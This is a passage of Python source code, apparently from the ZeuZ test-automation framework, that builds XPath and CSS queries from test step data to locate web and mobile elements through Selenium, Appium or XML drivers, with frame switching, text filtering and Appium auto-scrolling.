(\"yes\", \"true\", \"ok\", \"enable\")\n\n\n if get_parameter != \"\":\n\n result = sr.parse_variable(get_parameter)\n result = CommonUtil.ZeuZ_map_code_decoder(result) # Decode if this is a ZeuZ_map_code\n if result not in failed_tag_list:\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Returning saved element '%s' from shared variables\"\n % get_parameter,\n 1,\n )\n return result\n else:\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Element named '%s' not found in shared variables\" % get_parameter,\n 3,\n )\n return \"zeuz_failed\"\n\n if driver_type == \"pyautogui\":\n result = _pyautogui(step_data_set)\n if save_parameter != \"\": # save element to a variable\n sr.Set_Shared_Variables(save_parameter, result)\n return result\n\n # here we switch driver if we need to\n _switch(step_data_set)\n index_number = _locate_index_number(step_data_set)\n element_query, query_type = 
_construct_query(step_data_set, web_element_object)\n CommonUtil.ExecLog(sModuleInfo, f\"To locate the Element we used {query_type}:\\n{element_query}\", 5)\n\n if query_type in (\"xpath\", \"css\", \"unique\"):\n result = _get_xpath_or_css_element(element_query, query_type, step_data_set, index_number, Filter, return_all_elements, element_wait)\n if result == \"zeuz_failed\" and text_filter_cond:\n result = text_filter(step_data_set, Filter, element_wait, return_all_elements)\n else:\n result = \"zeuz_failed\"\n\n \"\"\" The following code should have handled element_click_interception_exception according to doc but it cannot handle yet kept the code for rnd \"\"\"\n # try:\n # if isinstance(result, selenium.webdriver.remote.webelement.WebElement):\n # if not EC.element_to_be_clickable(result):\n # CommonUtil.ExecLog(sModuleInfo, \"Waiting for the element to be clickable for at most %s seconds\" % wait_clickable, 2)\n # WebDriverWait(driver, wait_clickable).until(EC.element_to_be_clickable((By.XPATH, element_query)))\n # except:\n # CommonUtil.Exception_Handler(sys.exc_info())\n\n if result not in failed_tag_list:\n if type(result) != list:\n try:\n attribute_parameter = result.get_attribute('outerHTML')\n i, c = 0, 0\n for i in range(len(attribute_parameter)):\n if attribute_parameter[i] == '\"':\n c += 1 \n if (attribute_parameter[i] == \">\" and c % 2 == 0):\n break\n attribute_parameter = attribute_parameter[:i+1]\n CommonUtil.ExecLog(sModuleInfo, \"%s\" % (attribute_parameter), 5)\n except:\n pass\n if save_parameter != \"\": # save element to a variable\n sr.Set_Shared_Variables(save_parameter, result)\n sr.Set_Shared_Variables(\"zeuz_element\", result)\n return result # Return on pass\n elif result == \"zeuz_failed\":\n try:\n if len(generic_driver.find_elements(By.TAG_NAME, \"iframe\")) > 0:\n CommonUtil.ExecLog(sModuleInfo, \"You have Iframes in your Webpage. Try switching Iframe with \\\"Switch Iframe\\\" action\", 3)\n elif len(generic_driver.find_elements(By.TAG_NAME, \"frame\")) > 0:\n CommonUtil.ExecLog(sModuleInfo, \"You have Frames in your Webpage. 
Try switching Frame with \\\"Switch Iframe\\\" action\", 3)\n            except:\n                pass\n            return \"zeuz_failed\"\n    except Exception:\n        return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef text_filter(step_data_set, Filter, element_wait, return_all_elements):\n    \"\"\"\n    suppose dom has <div>Hello  World</div>\n    the text will be converted to \"<something unknown>Hello world<something unknown>\"\n    That's why (text, element parameter, Hello world) does not work\n    But (*text, element parameter, Hello world) works!\n    So for now we don't need this python script, as we have an existing solution\n    \"\"\"\n    try:\n        sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n        mid_vals = [\n            \"sibling parameter\",\n        ]\n        patterns = [\n            \"^sibling \\d parameter$\",\n        ]\n        temp_dataset = []\n        filters = []\n        for left, mid, right in step_data_set:\n            l = left.strip().lower().replace(\"*\", \"\")\n            m = mid.strip().lower()\n            if m in mid_vals:\n                return \"zeuz_failed\"\n            for pattern in patterns:\n                if re.search(pattern, m):\n                    return \"zeuz_failed\"\n            if l == \"text\" and m == \"element parameter\":\n                filters.append((left, mid, right))\n            else:\n                temp_dataset.append((left, mid, right))\n\n        if not filters:\n            return \"zeuz_failed\"\n\n        index_number = _locate_index_number(temp_dataset)\n        index_number = index_number if index_number is not None else 0\n        element_query, query_type = _construct_query(temp_dataset)\n        CommonUtil.ExecLog(sModuleInfo, f\"No Element found. Now we are trying to handle   and <space>\", 1)\n        CommonUtil.ExecLog(sModuleInfo, f\"To locate the Element we used {query_type}:\\n{element_query}\", 5)\n\n        if query_type in (\"xpath\", \"css\", \"unique\"):\n            result = _get_xpath_or_css_element(element_query, query_type, temp_dataset, None, Filter, True, element_wait)\n        else:\n            return \"zeuz_failed\"\n\n        tmp_results = []\n        similar_texts = []\n        for element in result:\n            for f in filters:\n                if element.text not in similar_texts and f[2].lower().replace(\"\\xa0\", \"\").replace(\" \", \"\") in re.sub('\\s+', '', element.text.lower().replace(\"\\xa0\", \"\")):\n                    similar_texts.append(element.text)\n                if f[0].startswith(\"**\") and f[2].lower().replace(\"\\xa0\", \" \") in element.text.lower().replace(\"\\xa0\", \" \"):\n                    break\n                elif f[0].startswith(\"*\") and f[2].replace(\"\\xa0\", \" \") in element.text.replace(\"\\xa0\", \" \"):\n                    break\n                elif f[2].replace(\"\\xa0\", \" \") == element.text.replace(\"\\xa0\", \" \"):\n                    break\n            else:\n                continue\n            tmp_results.append(element)\n\n        if return_all_elements:\n            CommonUtil.ExecLog(sModuleInfo, f\"Returning {len(tmp_results)} elements after applying Text Filter\", 1)\n            return result\n        if len(tmp_results) == 0:\n            CommonUtil.ExecLog(sModuleInfo, \"Found no element after applying Text Filter\", 3)\n            if len(similar_texts) > 0:\n                CommonUtil.ExecLog(sModuleInfo, f\"These are the similar texts found in the HTML: {str(similar_texts)[1:-1]}\", 3)\n            return \"zeuz_failed\"\n        CommonUtil.ExecLog(sModuleInfo, f\"Original text of the element is '{tmp_results[index_number].text}'\", 1)\n        if len(tmp_results) == index_number + 1 == 1:\n            return tmp_results[index_number]\n        else:\n            CommonUtil.ExecLog(sModuleInfo, f\"Found {len(tmp_results)} elements after applying Text Filter. 
Returning the element of index {index_number}\", 1)\n return tmp_results[index_number]\n\n except:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef Append(object, value, mid):\n try:\n idx = max(int(mid)-1, 0)\n except:\n idx = 0\n for i in range(len(object), idx + 1):\n object.append([])\n object[idx].append(value)\n return object\n\n\ndef Index(elem_list:list)->str:\n for left, mid, right in elem_list:\n if left.strip().lower() == \"index\":\n try:\n num = int(right.strip())\n if num >= 0:\n return str(num+1) # Converting 0 based idx to 1 based idx\n else:\n if num == -1: return \"last()\" # -1 to last()\n else: return f\"last(){str(num+1)}\" # -2 to last()-1\n except: return right.strip() # returning the string as is. such as 'last()'\n\n return \"last()\" # default is last()\n\n\n\ndef _construct_query(step_data_set, web_element_object=False):\n \"\"\"\n first find out if in our dataset user is using css or xpath. If they are using css or xpath, they cannot use any \n other feature such as child parameter or multiple element parameter to locate the element.\n If web_element_object = True then it will generate a xpath so that find_elements can find only the child elements\n inside the given parent element\n \"\"\"\n try:\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n collect_all_attribute = [x[0] for x in step_data_set]\n\n child_parameter_list = []\n element_parameter_list = []\n parent_parameter_list = []\n unique_parameter_list = []\n sibling_parameter_list = []\n following_parameter_list = []\n preceding_parameter_list = []\n\n for left, mid, right in step_data_set:\n mid_ = mid.replace(\" \", \"\").lower()\n if \"elementparameter\" == mid_: element_parameter_list.append((left, mid, right))\n elif \"uniqueparameter\" == mid_: unique_parameter_list.append((left, mid, right))\n elif \"parent\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"parent\", \"\").replace(\"parameter\", \"\")\n parent_parameter_list = Append(parent_parameter_list, (left, mid, right), mid_)\n elif \"sibling\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"sibling\", \"\").replace(\"parameter\", \"\")\n sibling_parameter_list = Append(sibling_parameter_list, (left, mid, right), mid_)\n elif \"child\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"child\", \"\").replace(\"parameter\", \"\")\n child_parameter_list = Append(child_parameter_list, (left, mid, right), mid_)\n elif \"preceding\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"preceding\", \"\").replace(\"parameter\", \"\")\n preceding_parameter_list = Append(preceding_parameter_list, (left, mid, right), mid_)\n elif \"following\" in mid_ and \"parameter\" in mid_:\n mid_ = mid_.replace(\"following\", \"\").replace(\"parameter\", \"\")\n following_parameter_list = Append(following_parameter_list, (left, mid, right), mid_)\n\n child_ref_exits = len(child_parameter_list) > 0\n parent_ref_exits = len(parent_parameter_list) > 0\n sibling_ref_exits = len(sibling_parameter_list) > 0\n unique_ref_exists = len(unique_parameter_list) > 0\n\n if (\n unique_ref_exists\n and driver_type in (\"appium\", \"selenium\")\n ): # for unique identifier\n return [unique_parameter_list[0][0], unique_parameter_list[0][2]], \"unique\"\n elif \"css\" in collect_all_attribute and \"xpath\" not in collect_all_attribute:\n # return the raw css command with css as type. 
We do this so that even if user enters other data, we will ignore them.\n # here we expect to get raw css query\n return ([x for x in step_data_set if \"css\" in x[0]][0][2]), \"css\"\n elif \"xpath\" in collect_all_attribute and \"css\" not in collect_all_attribute:\n # return the raw xpath command with xpath as type. We do this so that even if user enters other data, we will ignore them.\n # here we expect to get raw xpath query\n return ([x for x in step_data_set if \"xpath\" in x[0]][0][2]), \"xpath\"\n elif (\n not child_ref_exits\n and parent_ref_exits\n and not sibling_ref_exits\n and driver_type == \"xml\"\n ):\n \"\"\" If There is parent but making sure no child\"\"\"\n xpath_parent_list = _construct_xpath_list(parent_parameter_list)\n parent_xpath_string = _construct_xpath_string_from_list(xpath_parent_list)\n # For xml we just put parent first and element later\n xpath_element_list = _construct_xpath_list(element_parameter_list, True)\n element_xpath_string = _construct_xpath_string_from_list(xpath_element_list)\n xpath_element_list_combined = parent_xpath_string + element_xpath_string\n return _construct_xpath_string_from_list(xpath_element_list_combined), \"xpath\"\n\n elif child_ref_exits and driver_type == \"xml\":\n \"\"\"Currently we do not support child as reference for xml\"\"\"\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Currently we do not support child as reference for xml. Please contact info@automationsolutionz.com for help\",\n 3,\n )\n return False, False\n elif (\n not child_ref_exits\n and not parent_ref_exits\n and not sibling_ref_exits\n and not web_element_object\n ):\n \"\"\" If there are no child or parent as reference, then we construct the xpath differently\"\"\"\n # first we collect all rows with element parameter only\n xpath_element_list = _construct_xpath_list(element_parameter_list)\n return _construct_xpath_string_from_list(xpath_element_list), \"xpath\"\n elif web_element_object and driver_type in (\"appium\", \"selenium\"):\n \"\"\"\n 'descendant::<target element tag>[<target element attribute>]'\n \"\"\"\n xpath_element_list = _construct_xpath_list(element_parameter_list)\n element_xpath_string = _construct_xpath_string_from_list(xpath_element_list)\n element_xpath_string = element_xpath_string.replace(\"//\", \"\")\n\n full_query = \"descendant::\" + element_xpath_string\n return full_query, \"xpath\"\n\n\n '''^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'''\n '''^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'''\n\n \"\"\" //Pre_Element//following::Element[descendant::Child_1][descendant::Child_2][following::Following_Element] \"\"\"\n\n Precedings = \"\"\n for preciding_param in reversed(preceding_parameter_list):\n Precedings += f\"{_construct_xpath_string_from_list(_construct_xpath_list(preciding_param))[2:]}//following::\"\n\n Element = _construct_xpath_string_from_list(_construct_xpath_list(element_parameter_list))[2:]\n\n Child = \"\"\n for child_param in child_parameter_list:\n Child += f\"[descendant::{_construct_xpath_string_from_list(_construct_xpath_list(child_param))[2:]}]\"\n\n Followings = \"\"\n for following_param in reversed(following_parameter_list):\n Followings = f\"[following::{_construct_xpath_string_from_list(_construct_xpath_list(following_param))[2:]}{Followings}]\"\n\n Element = f\"{Element}{Child}{Followings}\"\n\n # if sibling_ref_exits and not parent_ref_exits:\n # 
CommonUtil.ExecLog(sModuleInfo, \"In order to use sibling reference you need to provide a common parent that contains both Element and Sibling\", 3)\n # return False, False\n if sibling_ref_exits:\n \"\"\"\n (//Sibling_1/ancestor::Parent [descendant::Element] [ (ancestor::GrandParent_1)[last()] ][ (ancestor::GrandParent_2)[last()] ][ (descendant::Sibling_2 )[last()]][ (descendant::Sibling_3)[last()] ])[last()]//Element[descendant::Child_1][descendant::Child_2]\n \"\"\"\n Sibling = _construct_xpath_string_from_list(_construct_xpath_list(sibling_parameter_list[0]))[2:]\n Other_Siblings = \"\"\n for sibling_param in sibling_parameter_list[1:]:\n Other_Sibling = _construct_xpath_string_from_list(_construct_xpath_list(sibling_param))[2:]\n Other_Siblings += f\"[descendant::{Other_Sibling}]\"\n\n if parent_ref_exits:\n Parent = _construct_xpath_string_from_list(_construct_xpath_list(parent_parameter_list[0]))[2:]\n else:\n Parent = \"*\"\n GrandParents = \"\"\n for parent_param in reversed(parent_parameter_list[1:]):\n GrandParent = _construct_xpath_string_from_list(_construct_xpath_list(parent_param))[2:]\n idx = Index(parent_param)\n GrandParents = f\"[(ancestor::{GrandParent}{GrandParents})[{idx}]]\"\n\n idx = Index(parent_parameter_list[0]) if parent_ref_exits else \"last()\"\n full_query = f\"(//{Precedings}{Sibling}/ancestor::{Parent}[descendant::{Element}]{GrandParents}{Other_Siblings})[{idx}]//{Element}\"\n return full_query, \"xpath\"\n\n elif not sibling_ref_exits:\n \"\"\"\n (//Sibling_1/ancestor::Parent [ (ancestor::GrandParent_1 [(ancestor::GrandParent_2)[last()]] )[last()] ][ (descendant::Sibling_2 )[last()]][ (descendant::Sibling_3)[last()] ])[last()]//Element[descendant::Child_1][descendant::Child_2] \n \"\"\"\n Parents = \"\"\n for parent_param in reversed(parent_parameter_list):\n Parent = _construct_xpath_string_from_list(_construct_xpath_list(parent_param))[2:]\n idx = Index(parent_param)\n Parents += f\"[(ancestor::{Parent}{Parents})[{idx}]]\"\n full_query = f\"//{Precedings}{Element}{Parents}\"\n return full_query, \"xpath\"\n\n CommonUtil.ExecLog(\n sModuleInfo,\n \"You have entered an unsupported data set. Please contact info@automationsolutionz.com for help\",\n 3,\n )\n return False, False\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef _driver_type(query_debug):\n \"\"\"\n This function will find out what type of driver it is. 
Query changes slightly for certain cases based on appium, selenium and xml.\n \"\"\"\n driver_type = None\n # check if its Appium, selenium or XML\n try:\n driver_string = str(generic_driver)\n print(driver_string)\n if query_debug == True:\n return \"debug\"\n elif \"selenium\" in driver_string or \"browser\" in driver_string:\n driver_type = \"selenium\"\n elif \"appium\" in driver_string:\n driver_type = \"appium\"\n elif \"Element\" in driver_string:\n driver_type = \"xml\"\n elif \"pyautogui\" in driver_string:\n driver_type = \"pyautogui\"\n else:\n driver_type = None\n return driver_type\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef _construct_xpath_list(parameter_list, add_dot=False):\n \"\"\"\n This function constructs the raw data from step data into a xpath friendly format but in a list\n \"\"\"\n try:\n # Setting the list empty\n element_main_body_list = []\n # these are special cases where we cannot treat their attribute as any other attribute such as id, class and so on...\n excluded_attribute = [\n \"**text\", \"*text\", \"text\",\n \"tag\",\n \"css\",\n \"index\",\n \"xpath\",\n \"switch frame\",\n \"switch window\",\n \"switch alert\",\n \"switch active\",\n ]\n for each_data_row in parameter_list:\n attribute = each_data_row[0].strip()\n attribute_value = each_data_row[2]\n quote = \"'\" if '\"' in attribute_value else '\"'\n\n if attribute == \"text\" and driver_type in (\"selenium\", \"xml\"): # exact search\n text_value = f'[text()={quote}{attribute_value}{quote}]'\n element_main_body_list.append(text_value)\n elif attribute == \"*text\" and driver_type in (\"selenium\", \"xml\"): # partial search\n text_value = f'[contains(text(),{quote}{attribute_value}{quote})]'\n element_main_body_list.append(text_value)\n elif attribute == \"**text\" and driver_type in (\"selenium\", \"xml\"): # partial search + ignore case\n text_value = f'[contains(translate(text(),\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\",\"abcdefghijklmnopqrstuvwxyz\"),{quote}{attribute_value.lower()}{quote})]'\n element_main_body_list.append(text_value)\n\n elif attribute == \"text\" and driver_type == \"appium\": # exact search\n current_context = generic_driver.context\n if \"WEB\" in current_context:\n text_value = f'[text()={quote}{attribute_value}{quote}]'\n else:\n text_value = f'[@text={quote}{attribute_value}{quote}]'\n element_main_body_list.append(text_value)\n elif attribute == \"**text\" and driver_type == \"appium\": # partial search + ignore case\n text_value = f\"[contains(translate(@text,'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),{quote}{attribute_value.lower()}{quote})]\"\n current_context = generic_driver.context\n element_main_body_list.append(text_value)\n elif attribute == \"*text\" and driver_type == \"appium\": # partial search\n current_context = generic_driver.context\n if \"WEB\" in current_context:\n text_value = f'[contains({attribute.split(\"*\")[1]}(),{quote}{attribute_value}{quote})]'\n else:\n text_value = f'[contains(@{attribute.split(\"*\")[1]},{quote}{attribute_value}{quote})]'\n element_main_body_list.append(text_value)\n\n elif attribute not in excluded_attribute and \"*\" not in attribute: # exact search\n other_value = f'[@{attribute}={quote}{attribute_value}{quote}]'\n element_main_body_list.append(other_value)\n elif attribute not in excluded_attribute and \"**\" in attribute: # partial search + ignore case\n if driver_type == \"appium\":\n other_value = 
f\"[contains(translate(@{attribute.split('**')[1]},'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),{quote}{attribute_value.lower()}{quote})]\"\n else:\n other_value = f\"[contains(translate(@{attribute.split('**')[1]},'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),{quote}{attribute_value.lower()}{quote})]\"\n element_main_body_list.append(other_value)\n elif attribute not in excluded_attribute and \"*\" in attribute: # partial search\n if driver_type == \"appium\":\n other_value = f'[contains(@{attribute.split(\"*\")[1]},{quote}{attribute_value}{quote})]'\n else:\n other_value = f'[contains(@{attribute.split(\"*\")[1]},{quote}{attribute_value}{quote})]'\n element_main_body_list.append(other_value)\n\n # we do the tag on its own\n # tag_was_given = any(\"tag\" in s for s in parameter_list)\n if \"tag\" in [x[0] for x in parameter_list]:\n tag_item = \"//\" + [x for x in parameter_list if \"tag\" in x][0][2]\n else:\n tag_item = \"//*\"\n if add_dot != False and driver_type != \"xml\":\n tag_item = \".\" + tag_item\n element_main_body_list.append(tag_item)\n # We need to reverse the list so that tag comes at the begining\n return list(reversed(element_main_body_list))\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef _construct_xpath_string_from_list(xpath_list):\n \"\"\"\n in this function, we simply take the list and construct the actual query in string\n \"\"\"\n try:\n xpath_string_format = \"\"\n for each in xpath_list:\n xpath_string_format = xpath_string_format + each\n return xpath_string_format\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef _switch(step_data_set):\n \"here we switch the global driver to any of the switch call\"\n try:\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n # find if frame switch is there. If user enters more than one frame, it will ignore\n # user should enter multiple frame in this order parent > child > grand child ... and so on\n if \"switch frame\" in [x[0] for x in step_data_set]:\n generic_driver.switch_to.default_content()\n CommonUtil.ExecLog(\n sModuleInfo,\n \"This method of 'switch frame' is deprecated and will be removed at a later period.\\n\" +\n \"Please use our new action 'Switch iframe' to get updated features\",\n 2)\n frame_switch = [x for x in step_data_set if \"switch frame\" == x[0]][0][2]\n # first we split by > and then we reconstruct the list by striping trailing spaces\n frame_switch_list = [(x.strip()) for x in (frame_switch.split(\">\"))]\n # we switch each frame in order\n for each_frame in frame_switch_list:\n CommonUtil.ExecLog(sModuleInfo, \"switching frame; %s\" % each_frame, 1)\n # switch by index. 
If index of iframe is provided, then we need to convert to int\n check_if_index = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\"]\n if each_frame in check_if_index:\n each_frame = int(each_frame)\n if isinstance(each_frame, str) and each_frame.strip().lower() == \"default content\":\n continue\n else:\n generic_driver.switch_to.frame(each_frame)\n\n return True\n \"\"\"\n # We are moving this as a dedicated action so that we do not need to keep switching windows for every action.\n # however, users will now need to perform switch to the main window when they are done with their actions for pop up window \n elif \"switch window\" in [x[0] for x in step_data_set]: \n #get the value of switch window\n window_switch = [x for x in step_data_set if 'switch window' == x[0]] [0][2]\n all_windows = generic_driver.window_handles\n window_handles_found = False\n for each in all_windows:\n generic_driver.switch_to.window(each)\n if window_switch in (generic_driver.title):\n window_handles_found = True\n CommonUtil.ExecLog(sModuleInfo, \"switched your window\", 1)\n break\n if window_handles_found == False:\n CommonUtil.ExecLog(sModuleInfo, \"unable to switch your window\", 3)\n return False\n else:\n return True\n \"\"\"\n\n elif \"switch alert\" in [x[0] for x in step_data_set]:\n generic_driver.switch_to_alert()\n CommonUtil.ExecLog(sModuleInfo, \"switching to alert\", 1)\n return True\n elif \"switch active\" in [x[0] for x in step_data_set]:\n CommonUtil.ExecLog(sModuleInfo, \"switching to active element\", 1)\n generic_driver.switch_to_active_element()\n return True\n else:\n return True\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n\n\ndef auto_scroll_appium(data_set, element_query):\n \"\"\"\n To auto scroll to an element which is scrollable, won't work if no scrollable element is present\n \"\"\"\n global generic_driver\n all_matching_elements_visible_invisible = []\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n scrollable_element = generic_driver.find_elements_by_android_uiautomator(\"new UiSelector().scrollable(true)\")\n auto_scroll = False\n inset = 0.1\n position = 0.5\n for left, mid, right in data_set:\n left = left.strip().lower()\n mid = mid.strip().lower()\n right = right.replace(\"%\", \"\").replace(\" \", \"\").lower()\n if \"scroll parameter\" in mid and left == \"auto scroll\" and right in (\"yes\", \"ok\", \"enable\", \"true\"):\n auto_scroll = True\n if auto_scroll == False :\n return []\n\n if len(scrollable_element) == 0:\n return []\n elif len(scrollable_element) > 1:\n CommonUtil.ExecLog(sModuleInfo, 'Multiple scrollable page found. So Auto scroll will not respond. 
Please use \"Scroll to an element\" action if you need scroll to find that element', 2)\n return []\n\n height = scrollable_element[0].size[\"height\"]\n width = scrollable_element[0].size[\"width\"]\n xstart_location = scrollable_element[0].location[\"x\"] # Starting location of the x-coordinate of scrollable element\n ystart_location = scrollable_element[0].location[\"y\"] # Starting location of the y-coordinate of scrollable element\n max_try = 10\n direction = \"up\" if height > width else \"left\"\n swipe_speed = None\n\n try:\n for left, mid, right in data_set:\n left = left.strip().lower()\n mid = mid.strip().lower()\n right = right.replace(\"%\", \"\").replace(\" \", \"\").lower()\n if \"scroll parameter\" in mid:\n if left == \"direction\" and right in (\"up\", \"down\", \"left\", \"right\"):\n direction = right\n elif left == \"swipe speed\":\n swipe_speed = float(right) / 1000.00\n elif left == \"inset\":\n inset = float(right) / 100.0\n elif left == \"position\":\n position = float(right) / 100.0\n elif left == \"max try\":\n max_try = float(right)\n except:\n CommonUtil.Exception_Handler(sys.exc_info(), None, \"Unable to parse data. Please write data in correct format\")\n return []\n\n if direction == \"up\":\n tmp = 1.0 - inset\n new_height = round(tmp * height)\n new_width = round(position * width)\n x1 = xstart_location + new_width\n x2 = x1\n y1 = ystart_location + new_height - 1\n y2 = ystart_location\n if swipe_speed is None:\n duration = new_height * 0.0032\n else:\n duration = new_height * swipe_speed\n elif direction == \"down\":\n tmp = 1.0 - inset\n new_height = round(tmp * height)\n new_width = round(position * width)\n x1 = xstart_location + new_width\n x2 = x1\n y1 = ystart_location + 1\n y2 = ystart_location + new_height\n if swipe_speed is None:\n duration = new_height * 0.0032\n else:\n duration = new_height * swipe_speed\n elif direction == \"left\":\n tmp = 1.0 - inset\n new_width = round(tmp * width)\n new_height = round(position * height)\n x1 = xstart_location + new_width - 1\n x2 = xstart_location\n y1 = ystart_location + new_height\n y2 = y1\n if swipe_speed is None:\n duration = new_width * 0.0032\n else:\n duration = new_width * swipe_speed\n\n elif direction == \"right\":\n tmp = 1.0 - inset\n new_width = round(tmp * width)\n new_height = round(position * height)\n x1 = xstart_location + 1\n x2 = xstart_location + new_width\n y1 = ystart_location + new_height\n y2 = y1\n if swipe_speed is None:\n duration = new_width * 0.0032\n else:\n duration = new_width * swipe_speed\n else:\n CommonUtil.ExecLog(sModuleInfo, \"Direction should be among up, down, right or left\", 3)\n return []\n\n try:\n CommonUtil.ExecLog(sModuleInfo, \"Auto scrolling with the following scroll parameter:\\n\" +\n \"Max_try: %s, Direction: %s, Duration of a swipe: %s second, Inset: %s, Position:%s\\n\" % (max_try, direction, duration, inset*100, position*100) +\n \"Calculated Coordinate: (%s,%s) to (%s,%s)\" % (x1, y1, x2, y2), 1)\n i = 0\n while i < max_try:\n # We will try to match the outerHTML of the scrollable element to determine the end of the scroll.\n page_src = tostring(fromstring(generic_driver.page_source).findall('.//*[@scrollable=\"true\"]')[0]).decode()\n generic_driver.swipe(x1, y1, x2, y2, duration * 1000) # duration seconds to milliseconds\n all_matching_elements_visible_invisible = generic_driver.find_elements(By.XPATH, element_query)\n if page_src == tostring(fromstring(generic_driver.page_source).findall('.//*[@scrollable=\"true\"]')[0]).decode() or 
len(all_matching_elements_visible_invisible) != 0:\n return all_matching_elements_visible_invisible\n i += 1\n return all_matching_elements_visible_invisible\n\n except Exception:\n CommonUtil.Exception_Handler(sys.exc_info(), None, \"Error could not auto scroll\")\n return []\n\n\ndef _get_xpath_or_css_element(element_query, css_xpath,data_set, index_number=None, Filter=\"\", return_all_elements=False, element_wait=None):\n \"\"\"\n Here, we actually execute the query based on css/xpath and then analyze if there are multiple.\n If we find multiple we give warning and send the first one we found.\n We also consider if user sent index. If they did, we send them the index they provided\n If return_all_elements = True then we return all elements.\n \"\"\"\n global generic_driver\n try:\n all_matching_elements_visible_invisible = False\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n\n exception_cnd = False\n if element_wait is None:\n element_wait = int(sr.Get_Shared_Variables(\"element_wait\"))\n end = time.time() + element_wait\n\n while True:\n if css_xpath == \"unique\" and (driver_type == \"appium\" or driver_type == \"selenium\"): # for unique id\n try:\n unique_key = element_query[0]\n unique_value = element_query[1]\n if driver_type == \"appium\" and (\n unique_key == \"accessibility id\"\n or unique_key == \"accessibility-id\"\n or unique_key == \"content-desc\"\n or unique_key == \"content desc\"\n ): # content-desc for android, accessibility id for iOS\n unique_element = generic_driver.find_element_by_accessibility_id(unique_value)\n elif unique_key == \"id\" or (driver_type == \"appium\" and (unique_key == \"resource id\" or unique_key == \"resource-id\" or unique_key == \"name\")): # name for iOS\n unique_element = generic_driver.find_element(By.ID, unique_value)\n elif unique_key == \"name\":\n unique_element = generic_driver.find_element(By.NAME, unique_value)\n elif unique_key == \"class\":\n unique_element = generic_driver.find_element(By.CLASS_NAME, unique_value)\n elif unique_key == \"tag\":\n unique_element = generic_driver.find_element(By.TAG_NAME, unique_value)\n elif unique_key == \"css\":\n unique_element = generic_driver.find_element(By.CSS_SELECTOR, unique_value)\n elif unique_key == \"xpath\":\n unique_element = generic_driver.find_element(By.XPATH, unique_value)\n elif unique_key in [\"text\", \"*text\"]:\n if driver_type == \"appium\":\n if unique_key == \"text\":\n unique_element = generic_driver.find_element(By.XPATH, '//*[@text=\"%s\"]' % unique_value)\n else:\n unique_element = generic_driver.find_element(By.XPATH, '//*[contains(@text,\"%s\")]' % unique_value)\n else:\n if unique_key == \"text\":\n unique_element = generic_driver.find_element(By.XPATH, '//*[text()=\"%s\"]' % unique_value)\n else:\n unique_element = generic_driver.find_element(By.XPATH, '//*[contains(text(),\"%s\")]' % unique_value)\n else:\n if \"*\" in unique_key:\n unique_key = unique_key[1:] # drop the asterisk\n unique_element = generic_driver.find_element(By.XPATH, \"//*[contains(@%s,'%s')]\" % (unique_key, unique_value))\n else:\n unique_element = generic_driver.find_element(By.XPATH, \"//*[@%s='%s']\" % (unique_key, unique_value))\n return unique_element\n except Exception as e:\n exception_cnd = True\n continue\n elif css_xpath == \"xpath\" and driver_type != \"xml\":\n all_matching_elements_visible_invisible = generic_driver.find_elements(By.XPATH, element_query)\n elif css_xpath == \"xpath\" and driver_type == \"xml\":\n 
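                # XML mode: generic_driver is presumably an lxml-style tree object here, so the
                # same XPath string is evaluated via its .xpath() method rather than
                # Selenium/Appium's find_elements.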
all_matching_elements_visible_invisible = generic_driver.xpath(element_query)\n elif css_xpath == \"css\":\n all_matching_elements_visible_invisible = generic_driver.find_elements(By.CSS_SELECTOR, element_query)\n\n if all_matching_elements_visible_invisible and len(filter_elements(all_matching_elements_visible_invisible, \"\")) > 0:\n break\n if time.time() > end:\n break\n # end of while loop\n\n if exception_cnd:\n return \"zeuz_failed\"\n\n if driver_type == \"appium\" and index_number is not None and index_number > 0 and len(all_matching_elements_visible_invisible) == 0:\n CommonUtil.ExecLog(sModuleInfo, \"Element not found and we do not support Auto Scroll when index is provided\", 2)\n elif driver_type == \"appium\" and len(all_matching_elements_visible_invisible) == 0:\n all_matching_elements_visible_invisible = auto_scroll_appium(data_set, element_query)\n \n all_matching_elements = filter_elements(all_matching_elements_visible_invisible, Filter)\n if Filter == \"allow hidden\":\n displayed_len = len(filter_elements(all_matching_elements_visible_invisible, \"\"))\n hidden_len = len(all_matching_elements_visible_invisible) - displayed_len\n else:\n displayed_len = len(all_matching_elements)\n hidden_len = len(all_matching_elements_visible_invisible) - displayed_len\n\n if return_all_elements:\n if Filter == \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning all of them\"\n % (hidden_len, displayed_len),\n 1\n )\n 